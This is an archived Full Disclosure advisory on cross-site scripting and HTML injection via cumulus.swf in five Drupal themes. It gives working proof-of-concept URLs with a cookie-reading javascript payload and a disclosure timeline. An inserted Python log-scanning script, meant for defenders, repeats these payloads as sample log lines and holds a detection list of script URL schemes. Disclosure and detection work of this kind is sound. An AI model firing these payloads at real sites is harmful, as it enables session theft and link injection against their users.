Full Disclosure mailing list archives
Vulnerability in multiple themes for Drupal
From: "MustLive" <mustlive () websecurity com ua>
Date: Sun, 2 Oct 2011 23:42:10 +0300
Hello list!

The endless saga continues. After informing you about a lot of vulnerable plugins and widgets with this swf-file, here is information about multiple vulnerable themes ;-).

I want to warn you about a Cross-Site Scripting vulnerability in multiple themes for Drupal. And a lot of other themes for Drupal and other engines can be vulnerable.

This XSS is similar to the XSS vulnerability in WP-Cumulus, which I disclosed in 2009 (http://securityvulns.com/Wdocument842.html), because these themes use cumulus.swf (it's the same tagcloud.swf made by the author of WP-Cumulus). I wrote about such vulnerabilities in 2009-2011; in particular, I mentioned the millions of tagcloud.swf flash files which are vulnerable to XSS attacks in my article "XSS vulnerabilities in 34 millions flash files" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-January/006033.html).

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of the themes Admire Grunge, Morok, Pushbutton, Danland and Analytic for Drupal.

----------
Details:
----------

XSS (WASC-08):

http://site/themes/admire_grunge/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

http://site/themes/morok/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

http://site/themes/pushbutton/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

http://site/sites/all/themes/danland/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

http://site/themes/analytic/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Code will execute after a click. It's strictly social XSS.

Also it's possible to conduct (like in WP-Cumulus) an HTML Injection attack.

HTML Injection (WASC-12):

http://site/path/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

-------------------------------------------------
Fixed version of swf-file:
-------------------------------------------------

All users of these and other themes, plugins and widgets (and their developers) with this swf-file could fix this issue by updating the swf-file to the fixed version. But as I wrote in my last advisory (http://lists.grok.org.uk/pipermail/full-disclosure/2011-September/082656.html), the developer of WP-Cumulus fixed only the XSS vector, but not the HTML Injection vector. So it's still possible to conduct HTML Injection attacks (for injecting arbitrary links) on all versions of this swf-file (including the version with the fixed XSS hole). This should be taken into account.

------------
Timeline:
------------

2009.11.09 - disclosed at my site about WP-Cumulus.
2009.11.11 - informed the developer of WP-Cumulus.
2009.11.15 - the developer of WP-Cumulus fixed the XSS (but not the HTML Injection).
2011.10.01 - disclosed at my site about five vulnerable themes for Drupal.

And a lot of other themes for Drupal and other engines can be vulnerable.

I mentioned these vulnerabilities at my site:
http://websecurity.com.ua/5407/

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
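As an added example (not part of MustLive's advisory or of any Drupal theme), here is a small defender-side log check for the issue described above: it parses Apache combined-format access log lines, picks out direct requests to cumulus.swf / tagcloud.swf that carry a tagcloud query parameter, and classifies each by the href values inside the decoded tag XML. Because the advisory notes that the fixed swf closes only the script-URL vector, the check flags a non-script, off-site href as "html_injection" rather than ignoring it. The sample log lines, IP addresses and the site hostname are constructed for the example; the log format regex assumes the standard combined format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# File names of the Flash tag-cloud component named in the advisory.
SWF_NAMES = ("cumulus.swf", "tagcloud.swf")
# URL schemes in an href that mean script execution on click (XSS vector).
SCRIPT_SCHEMES = ("javascript:", "vbscript:", "data:")

# Apache "combined" log format: ip ident user [time] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# href values inside the decoded <tags>...</tags> XML (quotes optional).
HREF_RE = re.compile(r"""href\s*=\s*['"]?([^'"\s>]+)""", re.IGNORECASE)

# Constructed sample log lines (hosts and addresses are invented; the first two
# mirror the XSS and HTML Injection request shapes shown in the advisory).
SAMPLE_LOG = """\
203.0.113.5 - - [02/Oct/2011:23:42:10 +0300] "GET /themes/morok/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E HTTP/1.1" 200 3045 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Oct/2011:23:43:01 +0300] "GET /sites/all/themes/danland/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://attacker.example'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E HTTP/1.1" 200 3045 "-" "Mozilla/5.0"
198.51.100.9 - - [02/Oct/2011:23:44:12 +0300] "GET /themes/analytic/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='/taxonomy/term/1'%3Edrupal%3C/a%3E%3C/tags%3E HTTP/1.1" 200 3045 "-" "Mozilla/5.0"
198.51.100.9 - - [02/Oct/2011:23:45:00 +0300] "GET /themes/analytic/cumulus.swf HTTP/1.1" 200 3045 "-" "Mozilla/5.0"
"""


def classify_tagcloud(tagcloud, site_host):
    """Return 'xss', 'html_injection' or 'review' for a decoded tagcloud value.

    'xss'            - an href uses a script-executing scheme.
    'html_injection' - an href points at a host other than site_host
                       (arbitrary link injection, still possible after the XSS fix).
    'review'         - tagcloud was passed in the query string but hrefs look local.
    """
    hrefs = HREF_RE.findall(tagcloud)
    for href in hrefs:
        if href.lstrip().lower().startswith(SCRIPT_SCHEMES):
            return "xss"
    for href in hrefs:
        host = urlsplit(href).hostname
        if host and host.lower() != site_host.lower():
            return "html_injection"
    return "review"


def scan_log(log_text, site_host):
    """Scan combined-format log text; return findings for tag-cloud swf requests."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m.group("target"))
        if not parts.path.lower().endswith(SWF_NAMES):
            continue
        params = parse_qs(parts.query)  # percent-decodes and turns '+' into spaces
        if "tagcloud" not in params:
            continue  # the swf alone being fetched is normal embedding traffic
        tagcloud = params["tagcloud"][0]
        findings.append({
            "ip": m.group("ip"),
            "time": m.group("ts"),
            "path": parts.path,
            "severity": classify_tagcloud(tagcloud, site_host),
            "tagcloud": tagcloud,
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG, "site.example"):
        print(f"{f['severity']:<15} {f['ip']:<14} {f['path']}")
```

The check keys on the tagcloud parameter arriving in the query string because the embedding markup normally supplies it via flashvars, so a direct GET carrying it is worth a look on its own; the severity only decides how urgently. Removing or replacing the swf file in the theme directory, as the advisory recommends, is the actual fix; this script is for finding out whether the issue was exercised before that happened.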
Current thread:
- Vulnerability in multiple themes for Drupal MustLive (Oct 02)
- <Possible follow-ups>
- Re: Vulnerability in multiple themes for Drupal Greg Knaddison (Oct 04)